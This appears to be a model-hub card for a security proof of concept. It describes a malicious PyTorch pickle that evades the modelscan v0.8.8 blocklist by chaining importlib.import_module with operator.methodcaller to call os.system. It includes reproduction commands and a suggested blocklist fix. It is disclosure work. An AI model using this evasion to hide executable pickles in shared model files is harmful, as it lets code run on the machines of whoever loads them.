Modelscan Bypass PoC β importlib + operator.methodcaller
Security research artifact. Do NOT load in production.
This model file bypasses modelscan v0.8.8
and executes arbitrary code when loaded via torch.load().
Bypass technique
modelscan's unsafe_globals blocklist covers os.*, subprocess.*, builtins.eval/exec/__import__,
operator.attrgetter, etc. However, it does NOT block:
importlib.import_moduleβ can import any module includingosoperator.methodcallerβ can call any method on an object (onlyattrgetteris blocked)
The pickle chains these two:
operator.methodcaller('system', 'cmd')(importlib.import_module('os'))
= os.system('cmd')
= RCE
Reproduction
# Verify modelscan does NOT detect it
pip install modelscan
modelscan scan pytorch_model-00001-of-00001.bin
# Output: No issues found β
# Verify RCE
python3 -c "import torch; torch.load('pytorch_model-00001-of-00001.bin', weights_only=False)"
cat /tmp/mfv_modelscan_bypass_poc
Fix
Add importlib and operator.methodcaller to modelscan's unsafe_globals:
"CRITICAL": {
"importlib": "*", # β ADD
"operator": ["attrgetter", "methodcaller"], # β ADD methodcaller
...
}
- Downloads last month
- 6
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support